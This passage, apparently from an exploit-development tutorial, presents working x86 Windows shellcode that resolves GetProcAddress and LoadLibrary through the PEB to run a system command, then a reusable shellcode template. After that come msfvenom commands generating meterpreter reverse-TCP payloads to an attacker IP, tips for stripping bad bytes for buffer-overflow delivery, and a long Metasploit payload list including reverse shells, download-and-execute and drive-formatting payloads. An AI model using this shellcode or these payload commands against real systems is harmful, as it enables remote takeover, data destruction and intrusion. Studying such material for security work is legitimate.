        add esi, ebx                         ; ESI = Ordinals table
        mov cx, [esi + ecx * 2]              ; CX = unbiased ordinal = index into the address table
        mov esi, [edx + 0x1c]                ; Offset address table
        add esi, ebx                         ; ESI = Address table
        mov edx, [esi + ecx * 4]             ; EDX = Pointer(offset)
        add edx, ebx                         ; EDX = GetProcAddress

        xor ecx, ecx    ; ECX = 0
        push ebx        ; Kernel32 base address
        push edx        ; GetProcAddress
        push ecx        ; 0
        push 0x41797261 ; aryA
        push 0x7262694c ; Libr
        push 0x64616f4c ; Load
        push esp        ; "LoadLibrary"
        push ebx        ; Kernel32 base address
        call edx        ; GetProcAddress(LL)

        add esp, 0xc    ; pop "LoadLibrary"
        pop ecx         ; ECX = 0
        push eax        ; EAX = LoadLibrary
        push ecx
        mov cx, 0x6c6c  ; ll
        push ecx
        push 0x642e7472 ; rt.d
        push 0x6376736d ; msvc
        push esp        ; "msvcrt.dll"
        call eax        ; LoadLibrary("msvcrt.dll")

        ;address of system
        add esp, 0x10                       ; Clean stack
        mov edx, [esp + 0x4]                ; EDX = GetProcAddress
        xor ecx, ecx                        ; ECX = 0
        push ecx                            ; 73797374 656d
        mov  ecx,0x61626d65                 ; emba
        push ecx
        sub dword ptr[esp + 0x3], 0x61      ; Remove “a”
        sub dword ptr[esp + 0x2], 0x62      ; Remove “b”
        push 0x74737973                     ; syst
        push esp                            ; system
        push eax                            ; msvcrt.dll address
        call edx                            ; GetProc(system)

        add esp, 0x10         ; Cleanup stack
        ;run the core payload
        push ebp
        mov  ebp,esp
        sub  esp,0x4
        xor  esi,esi
        mov  esi,0x00726964             ;dir
        mov  dword ptr[ebp-04h],esi
        lea  esi, [ebp-04h]
        push esi
        call eax    

        ;stack balance
        add esp,0x8  ;restore esp: the argument and the local
        pop esi

        ;exit the process
        pop edx                         ; GetProcAddress
        pop ebx                         ; kernel32.dll base address
        mov ecx, 0x61737365             ; essa
        push ecx
        sub dword ptr [esp + 0x3], 0x61 ; Remove "a"
        push 0x636f7250                 ; Proc
        push 0x74697845                 ; Exit
        push esp
        push ebx                        ; kernel32.dll base address
        call edx                        ; GetProc(Exec)
        xor ecx, ecx                    ; ECX = 0
        push ecx                        ; Return code = 0
        call eax                        ; ExitProcess
    }
}

Shellcode framework

xor ecx, ecx
  mov eax, fs:[ecx + 0x30] ; EAX = PEB
  mov eax, [eax + 0xc]     ; EAX = PEB->Ldr
  mov esi, [eax + 0x14]    ; ESI = PEB->Ldr.InMemOrder
  lodsd                    ; EAX = Second module
  xchg eax, esi            ; EAX = ESI, ESI = EAX
  lodsd                    ; EAX = Third(kernel32)
  mov ebx, [eax + 0x10]    ; EBX = Base address
  mov edx, [ebx + 0x3c]    ; EDX = DOS->e_lfanew
  add edx, ebx             ; EDX = PE Header
  mov edx, [edx + 0x78]    ; EDX = Offset export table
  add edx, ebx             ; EDX = Export table
  mov esi, [edx + 0x20]    ; ESI = Offset namestable
  add esi, ebx             ; ESI = Names table
  xor ecx, ecx             ; EXC = 0

Get_Function:
  inc ecx                              ; Increment the ordinal
  lodsd                                ; Get name offset
  add eax, ebx                         ; Get function name
  cmp dword ptr[eax], 0x50746547       ; GetP
  jnz Get_Function
  cmp dword ptr[eax + 0x4], 0x41636f72 ; rocA
  jnz Get_Function
  cmp dword ptr[eax + 0x8], 0x65726464 ; ddre
  jnz Get_Function
  dec ecx                              ; ECX = index of the matching name (loop left it one too high)
  mov esi, [edx + 0x24]                ; ESI = Offset ordinals
  add esi, ebx                         ; ESI = Ordinals table
  mov cx, [esi + ecx * 2]              ; CX = unbiased ordinal = index into the address table
  mov esi, [edx + 0x1c]                ; Offset address table
  add esi, ebx                         ; ESI = Address table
  mov edx, [esi + ecx * 4]             ; EDX = Pointer(offset)
  add edx, ebx                         ; EDX = GetProcAddress

  xor ecx, ecx    ; ECX = 0
  push ebx        ; Kernel32 base address
  push edx        ; GetProcAddress
  push ecx        ; 0
  push 0x41797261 ; aryA
  push 0x7262694c ; Libr
  push 0x64616f4c ; Load
  push esp        ; "LoadLibrary"
  push ebx        ; Kernel32 base address
  call edx        ; GetProcAddress(LL)

  add esp, 0xc    ; pop "LoadLibrary"
  pop ecx         ; ECX = 0
  push eax        ; EAX = LoadLibrary
  ;DLL name string: push it here as dwords, last dword first, NUL-terminated, no 0x00 bytes in the code
  ;push 0xffffffff
  push esp        ; "xxx.dll"
  call eax        ; LoadLibrary("xxx.dll")

  ;find the target function's address
  add esp, 0xff                     ; Clean stack: replace 0xff with the number of bytes the DLL name occupied
  mov edx, [esp + 0x4]              ; EDX = GetProcAddress
  ;function name string: push it here as dwords, last dword first, NUL-terminated
  ;push 0xffffffff
  push esp                              ; "xxx" function name
  push eax                              ; xxx.dll address
  call edx                              ; GetProcAddress(xxx)

  add esp, 0xff         ; Cleanup stack: replace 0xff with the bytes of the function name plus 4 for the saved LoadLibrary address
  ;run the core payload
  ;the shellcode's actual work goes here

  ;stack balance
  add esp,0xff  ;restore esp: undo whatever the payload above pushed, so GetProcAddress is back on top

  ;exit the process
  pop edx                         ; GetProcAddress
  pop ebx                         ; kernel32.dll base address
  mov ecx, 0x61737365             ; essa
  push ecx
  sub dword ptr [esp + 0x3], 0x61 ; Remove "a"
  push 0x636f7250                 ; Proc
  push 0x74697845                 ; Exit
  push esp
  push ebx                        ; kernel32.dll base address
  call edx                        ; GetProc(Exec)
  xor ecx, ecx                    ; ECX = 0
  push ecx                        ; Return code = 0
  call eax                        ; ExitProcess

Shellcode from common security tools

Generating shellcode with MSF

Generating shellcode

windows: msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f c

linux: msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f c

mac: msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f c

If the payload will be delivered through a C-string copy, as in the overflow examples above, add -b '\x00' (and any other bytes the delivery path cannot carry) so msfvenom encodes them away; check the output for bad bytes before using it.

Other payloads to choose from (note the ones with exec in the name):

root@localhost:~# msfvenom -l payloads

Name                                          Description

aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
android/meterpreter/reverse_http Run a meterpreter server on Android. Tunnel communication over HTTP
android/meterpreter/reverse_https Run a meterpreter server on Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp Run a meterpreter server on Android. Connect back stager
android/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP
android/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS
android/shell/reverse_tcp Spawn a piped command shell (sh). Connect back stager
bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/x64/exec Execute an arbitrary command
bsd/x64/shell_bind_ipv6_tcp Listen for a connection and spawn a command shell over IPv6
bsd/x64/shell_bind_tcp Bind an arbitrary command to an arbitrary port
bsd/x64/shell_bind_tcp_small Listen for a connection and spawn a command shell
bsd/x64/shell_reverse_ipv6_tcp Connect back to attacker and spawn a command shell over IPv6
bsd/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/x64/shell_reverse_tcp_small Connect back to attacker and spawn a command shell
bsd/x86/exec Execute an arbitrary command
bsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/shell/bind_ipv6_tcp Spawn a command shell (staged). Listen for a connection over IPv6
bsd/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection
bsd/x86/shell/find_tag Spawn a command shell (staged). Use an established connection
bsd/x86/shell/reverse_ipv6_tcp Spawn a command shell (staged). Connect back to the attacker over IPv6
bsd/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
bsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/x86/shell_bind_tcp_ipv6 Listen for a connection and spawn a command shell over IPv6
bsd/x86/shell_find_port Spawn a shell on an established connection
bsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
bsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/x86/shell_reverse_tcp_ipv6 Connect back to attacker and spawn a command shell over IPv6
bsdi/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection
bsdi/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
bsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsdi/x86/shell_find_port Spawn a shell on an established connection
bsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
cmd/unix/bind_awk Listen for a connection and spawn a command shell via GNU AWK
cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)
cmd/unix/bind_lua Listen for a connection and spawn a command shell via Lua
cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_netcat_gaping Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_netcat_gaping_ipv6 Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_nodejs Continually listen for a connection and spawn a command shell via nodejs
cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl
cmd/unix/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl
cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
cmd/unix/bind_ruby_ipv6 Continually listen for a connection and spawn a command shell via Ruby
cmd/unix/bind_zsh Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn’t usually installed by default.
cmd/unix/generic Executes the supplied command
cmd/unix/interact Interacts with a shell on an established socket connection
cmd/unix/reverse Creates an interactive shell through two inbound connections
cmd/unix/reverse_awk Creates an interactive shell via GNU AWK
cmd/unix/reverse_bash Creates an interactive shell via bash’s builtin /dev/tcp. This will not work on most Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature.
cmd/unix/reverse_bash_telnet_ssl Creates an interactive shell via mknod and telnet. This method works on Debian and other systems compiled without /dev/tcp support. This module uses the ‘-z’ option included on some systems to encrypt using SSL.
cmd/unix/reverse_lua Creates an interactive shell via Lua
cmd/unix/reverse_netcat Creates an interactive shell via netcat
cmd/unix/reverse_netcat_gaping Creates an interactive shell via netcat
cmd/unix/reverse_nodejs Continually listen for a connection and spawn a command shell via nodejs
cmd/unix/reverse_openssl Creates an interactive shell through two inbound connections
cmd/unix/reverse_perl Creates an interactive shell via perl
cmd/unix/reverse_perl_ssl Creates an interactive shell via perl, uses SSL
cmd/unix/reverse_php_ssl Creates an interactive shell via php, uses SSL
cmd/unix/reverse_python Connect back and create a command shell via Python
cmd/unix/reverse_python_ssl Creates an interactive shell via python, uses SSL, encodes with base64 by design.
cmd/unix/reverse_ruby Connect back and create a command shell via Ruby
cmd/unix/reverse_ruby_ssl Connect back and create a command shell via Ruby, uses SSL
cmd/unix/reverse_ssl_double_telnet Creates an interactive shell through two inbound connections, encrypts using SSL via “-z” option
cmd/unix/reverse_zsh Connect back and create a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn’t usually installed by default.
cmd/windows/adduser Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)
cmd/windows/bind_lua Listen for a connection and spawn a command shell via Lua
cmd/windows/bind_perl Listen for a connection and spawn a command shell via perl (persistent)
cmd/windows/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent)
cmd/windows/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
cmd/windows/download_eval_vbs Downloads a file from an HTTP(S) URL and executes it as a vbs script. Use it to stage a vbs encoded payload from a short command line.
cmd/windows/download_exec_vbs Download an EXE from an HTTP(S) URL and execute it
cmd/windows/generic Executes the supplied command
cmd/windows/powershell_bind_tcp Interacts with a powershell session on an established socket connection
cmd/windows/powershell_reverse_tcp Interacts with a powershell session on an established socket connection
cmd/windows/reverse_lua Creates an interactive shell via Lua
cmd/windows/reverse_perl Creates an interactive shell via perl
cmd/windows/reverse_powershell Connect back and create a command shell via Powershell
cmd/windows/reverse_ruby Connect back and create a command shell via Ruby
firefox/exec This module runs a shell command on the target OS withough touching the disk. On Windows, this command will flash the command prompt momentarily. This can be avoided by setting WSCRIPT to true, which drops a jscript “launcher” to disk that hides the prompt.
firefox/shell_bind_tcp Creates an interactive shell via Javascript with access to Firefox’s XPCOM API
firefox/shell_reverse_tcp Creates an interactive shell via Javascript with access to Firefox’s XPCOM API
generic/custom Use custom string or file as payload. Set either PAYLOADFILE or PAYLOADSTR.
generic/debug_trap Generate a debug trap in the target process
generic/shell_bind_tcp Listen for a connection and spawn a command shell
generic/shell_reverse_tcp Connect back to attacker and spawn a command shell
generic/tight_loop Generate a tight loop in the target process
java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
java/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection
java/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP
java/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS
java/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager
java/shell/bind_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection
java/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
java/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/armle/adduser Create a new user with UID 0
linux/armle/exec Execute an arbitrary command
linux/armle/shell/bind_tcp dup2 socket in r12, then execve. Listen for a connection
linux/armle/shell/reverse_tcp dup2 socket in r12, then execve. Connect back to the attacker
linux/armle/shell_bind_tcp Connect to target and spawn a command shell
linux/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/mipsbe/exec A very small shellcode for executing commands. This module is sometimes helpful for testing purposes.
linux/mipsbe/reboot A very small shellcode for rebooting the system. This payload is sometimes helpful for testing purposes or executing other payloads that rely on initial startup procedures.
linux/mipsbe/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
linux/mipsbe/shell_bind_tcp Listen for a connection and spawn a command shell
linux/mipsbe/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/mipsle/exec A very small shellcode for executing commands. This module is sometimes helpful for testing purposes as well as on targets with extremely limited buffer space.
linux/mipsle/reboot A very small shellcode for rebooting the system. This payload is sometimes helpful for testing purposes.
linux/mipsle/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
linux/mipsle/shell_bind_tcp Listen for a connection and spawn a command shell
linux/mipsle/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
linux/ppc/shell_find_port Spawn a shell on an established connection
linux/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/ppc64/shell_bind_tcp Listen for a connection and spawn a command shell
linux/ppc64/shell_find_port Spawn a shell on an established connection
linux/ppc64/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/x64/exec Execute an arbitrary command
linux/x64/shell/bind_tcp Spawn a command shell (staged). Listen for a connection
linux/x64/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
linux/x64/shell_bind_tcp Listen for a connection and spawn a command shell
linux/x64/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: ‘nmap -sS target -p-’.
linux/x64/shell_find_port Spawn a shell on an established connection
linux/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/x86/adduser Create a new user with UID 0
linux/x86/chmod Runs chmod on specified file with specified mode
linux/x86/exec Execute an arbitrary command
linux/x86/meterpreter/bind_ipv6_tcp Inject the meterpreter server payload (staged). Listen for an IPv6 connection (Linux x86)
linux/x86/meterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server payload (staged). Listen for an IPv6 connection with UUID Support (Linux x86)
linux/x86/meterpreter/bind_nonx_tcp Inject the meterpreter server payload (staged). Listen for a connection
linux/x86/meterpreter/bind_tcp Inject the meterpreter server payload (staged). Listen for a connection (Linux x86)
linux/x86/meterpreter/bind_tcp_uuid Inject the meterpreter server payload (staged). Listen for a connection with UUID Support (Linux x86)
linux/x86/meterpreter/find_tag Inject the meterpreter server payload (staged). Use an established connection
linux/x86/meterpreter/reverse_ipv6_tcp Inject the meterpreter server payload (staged). Connect back to attacker over IPv6
linux/x86/meterpreter/reverse_nonx_tcp Inject the meterpreter server payload (staged). Connect back to the attacker
linux/x86/meterpreter/reverse_tcp Inject the meterpreter server payload (staged). Connect back to the attacker
linux/x86/meterpreter/reverse_tcp_uuid Inject the meterpreter server payload (staged). Connect back to the attacker
linux/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
linux/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
linux/x86/read_file Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor
linux/x86/shell/bind_ipv6_tcp Spawn a command shell (staged). Listen for an IPv6 connection (Linux x86)
linux/x86/shell/bind_ipv6_tcp_uuid Spawn a command shell (staged). Listen for an IPv6 connection with UUID Support (Linux x86)
linux/x86/shell/bind_nonx_tcp Spawn a command shell (staged). Listen for a connection
linux/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection (Linux x86)
linux/x86/shell/bind_tcp_uuid Spawn a command shell (staged). Listen for a connection with UUID Support (Linux x86)
linux/x86/shell/find_tag Spawn a command shell (staged). Use an established connection
linux/x86/shell/reverse_ipv6_tcp Spawn a command shell (staged). Connect back to attacker over IPv6
linux/x86/shell/reverse_nonx_tcp Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp_uuid Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell
linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell
linux/x86/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: ‘nmap -sS target -p-’.
linux/x86/shell_find_port Spawn a shell on an established connection
linux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/x86/shell_reverse_tcp2 Connect back to attacker and spawn a command shell
mainframe/shell_reverse_tcp Listen for a connection and spawn a command shell. This implmentation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.
netware/shell/reverse_tcp Connect to the NetWare console (staged). Connect back to the attacker
nodejs/shell_bind_tcp Creates an interactive shell via nodejs
nodejs/shell_reverse_tcp Creates an interactive shell via nodejs
nodejs/shell_reverse_tcp_ssl Creates an interactive shell via nodejs, uses SSL
osx/armle/execute/bind_tcp Spawn a command shell (staged). Listen for a connection
osx/armle/execute/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
osx/armle/shell/bind_tcp Spawn a command shell (staged). Listen for a connection
osx/armle/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
osx/armle/shell_bind_tcp Listen for a connection and spawn a command shell
osx/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/armle/vibrate Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller <cmiller[at]securityevaluators.com>.
osx/ppc/shell/bind_tcp Spawn a command shell (staged). Listen for a connection
osx/ppc/shell/find_tag Spawn a command shell (staged). Use an established connection
osx/ppc/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
osx/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
osx/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/x64/dupandexecve/bind_tcp dup2 socket in edi, then execve. Listen, read length, read buffer, execute
osx/x64/dupandexecve/reverse_tcp dup2 socket in edi, then execve. Connect, read length, read buffer, execute
osx/x64/exec Execute an arbitrary command
osx/x64/say Say an arbitrary string outloud using Mac OS X text2speech
osx/x64/shell_bind_tcp Bind an arbitrary command to an arbitrary port
osx/x64/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
osx/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/x86/bundleinject/bind_tcp Inject a custom Mach-O bundle into the exploited process. Listen, read length, read buffer, execute
osx/x86/bundleinject/reverse_tcp Inject a custom Mach-O bundle into the exploited process. Connect, read length, read buffer, execute
osx/x86/exec Execute an arbitrary command
osx/x86/isight/bind_tcp Inject a Mach-O bundle to capture a photo from the iSight (staged). Listen, read length, read buffer, execute
osx/x86/isight/reverse_tcp Inject a Mach-O bundle to capture a photo from the iSight (staged). Connect, read length, read buffer, execute
osx/x86/shell_bind_tcp Listen for a connection and spawn a command shell
osx/x86/shell_find_port Spawn a shell on an established connection
osx/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/x86/vforkshell/bind_tcp Call vfork() if necessary and spawn a command shell (staged). Listen, read length, read buffer, execute
osx/x86/vforkshell/reverse_tcp Call vfork() if necessary and spawn a command shell (staged). Connect, read length, read buffer, execute
osx/x86/vforkshell_bind_tcp Listen for a connection, vfork if necessary, and spawn a command shell
osx/x86/vforkshell_reverse_tcp Connect back to attacker, vfork if necessary, and spawn a command shell
php/bind_perl Listen for a connection and spawn a command shell via perl (persistent)
php/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent) over IPv6
php/bind_php Listen for a connection and spawn a command shell via php
php/bind_php_ipv6 Listen for a connection and spawn a command shell via php (IPv6)
php/download_exec Download an EXE from an HTTP URL and execute it
php/exec Execute a single system command
php/meterpreter/bind_tcp Run a meterpreter server in PHP. Listen for a connection
php/meterpreter/bind_tcp_ipv6 Run a meterpreter server in PHP. Listen for a connection over IPv6
php/meterpreter/bind_tcp_ipv6_uuid Run a meterpreter server in PHP. Listen for a connection over IPv6 with UUID Support
php/meterpreter/bind_tcp_uuid Run a meterpreter server in PHP. Listen for a connection with UUID Support
php/meterpreter/reverse_tcp Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions
php/meterpreter/reverse_tcp_uuid Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions
php/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter server (PHP)
php/reverse_perl Creates an interactive shell via perl
php/reverse_php Reverse PHP connect back shell with checks for disabled functions
php/shell_findsock Spawn a shell on the established connection to the webserver. Unfortunately, this payload can leave conspicuous evil-looking entries in the apache error logs, so it is probably a good idea to use a bind or reverse shell unless firewalls prevent them from working. The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on other Debian-based distributions. Only tested on Apache but it might work on other web servers that leak file descriptors to child processes.
python/meterpreter/bind_tcp Run a meterpreter server in Python (2.5-2.7 & 3.1-3.5). Listen for a connection
python/meterpreter/bind_tcp_uuid Run a meterpreter server in Python (2.5-2.7 & 3.1-3.5). Listen for a connection with UUID Support
python/meterpreter/reverse_http Run a meterpreter server in Python (2.5-2.7 & 3.1-3.5). Tunnel communication over HTTP
python/meterpreter/reverse_https Run a meterpreter server in Python (2.5-2.7 & 3.1-3.5). Tunnel communication over HTTP using SSL
python/meterpreter/reverse_tcp Run a meterpreter server in Python (2.5-2.7 & 3.1-3.5). Connect back to the attacker
python/meterpreter/reverse_tcp_uuid Run a meterpreter server in Python (2.5-2.7 & 3.1-3.5). Connect back to the attacker with UUID Support
python/meterpreter_bind_tcp Connect to the victim and spawn a Meterpreter shell
python/meterpreter_reverse_http Connect back to the attacker and spawn a Meterpreter shell
python/meterpreter_reverse_https Connect back to the attacker and spawn a Meterpreter shell
python/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell
python/shell_reverse_tcp Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.3.3
python/shell_reverse_tcp_ssl Creates an interactive shell via python, uses SSL, encodes with base64 by design.
ruby/shell_bind_tcp Continually listen for a connection and spawn a command shell via Ruby
ruby/shell_bind_tcp_ipv6 Continually listen for a connection and spawn a command shell via Ruby
ruby/shell_reverse_tcp Connect back and create a command shell via Ruby
ruby/shell_reverse_tcp_ssl Connect back and create a command shell via Ruby, uses SSL
solaris/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
solaris/sparc/shell_find_port Spawn a shell on an established connection
solaris/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
solaris/x86/shell_bind_tcp Listen for a connection and spawn a command shell
solaris/x86/shell_find_port Spawn a shell on an established connection
solaris/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
tty/unix/interact Interacts with a TTY on an established socket connection
windows/adduser Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)
windows/dllinject/bind_hidden_ipknock_tcp Inject a DLL via a reflective loader. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as “closed,” thus helping to hide the shellcode
windows/dllinject/bind_hidden_tcp Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/dllinject/bind_ipv6_tcp Inject a DLL via a reflective loader. Listen for an IPv6 connection (Windows x86)
windows/dllinject/bind_ipv6_tcp_uuid Inject a DLL via a reflective loader. Listen for an IPv6 connection with UUID Support (Windows x86)
windows/dllinject/bind_nonx_tcp Inject a DLL via a reflective loader. Listen for a connection (No NX)
windows/dllinject/bind_tcp Inject a DLL via a reflective loader. Listen for a connection (Windows x86)
windows/dllinject/bind_tcp_rc4 Inject a DLL via a reflective loader. Listen for a connection
windows/dllinject/bind_tcp_uuid Inject a DLL via a reflective loader. Listen for a connection with UUID Support (Windows x86)
windows/dllinject/find_tag Inject a DLL via a reflective loader. Use an established connection
windows/dllinject/reverse_hop_http Inject a DLL via a reflective loader. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.
windows/dllinject/reverse_http Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows wininet)
windows/dllinject/reverse_http_proxy_pstore Inject a DLL via a reflective loader. Tunnel communication over HTTP
windows/dllinject/reverse_ipv6_tcp Inject a DLL via a reflective loader. Connect back to the attacker over IPv6
windows/dllinject/reverse_nonx_tcp Inject a DLL via a reflective loader. Connect back to the attacker (No NX)
windows/dllinject/reverse_ord_tcp Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_allports Inject a DLL via a reflective loader. Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/dllinject/reverse_tcp_dns Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_rc4 Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_rc4_dns Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_uuid Inject a DLL via a reflective loader. Connect back to the attacker with UUID Support
windows/dllinject/reverse_winhttp Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows winhttp)
windows/dns_txt_query_exec Performs a TXT query against a series of DNS record(s) and executes the returned payload
windows/download_exec Download an EXE from an HTTP(S)/FTP URL and execute it
windows/exec Execute an arbitrary command
windows/format_all_drives This payload formats all mounted disks in Windows (aka ShellcodeOfDeath). After formatting, this payload sets the volume label to the string specified in the VOLUMELABEL option. If the code is unable to access a drive for any reason, it skips the drive and proceeds to the next volume.
windows/loadlibrary Load an arbitrary library path
windows/messagebox Spawns a dialog via MessageBox using a customizable title, text & icon
windows/meterpreter/bind_hidden_ipknock_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as “closed,” thus helping to hide the shellcode
windows/meterpreter/bind_hidden_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/meterpreter/bind_ipv6_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for an IPv6 connection (Windows x86)
windows/meterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for an IPv6 connection with UUID Support (Windows x86)
windows/meterpreter/bind_nonx_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection (No NX)
windows/meterpreter/bind_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection (Windows x86)
windows/meterpreter/bind_tcp_rc4 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection
windows/meterpreter/bind_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection with UUID Support (Windows x86)
windows/meterpreter/find_tag Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Use an established connection
windows/meterpreter/reverse_hop_http Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.
windows/meterpreter/reverse_http Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTP (Windows wininet)
windows/meterpreter/reverse_http_proxy_pstore Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTP
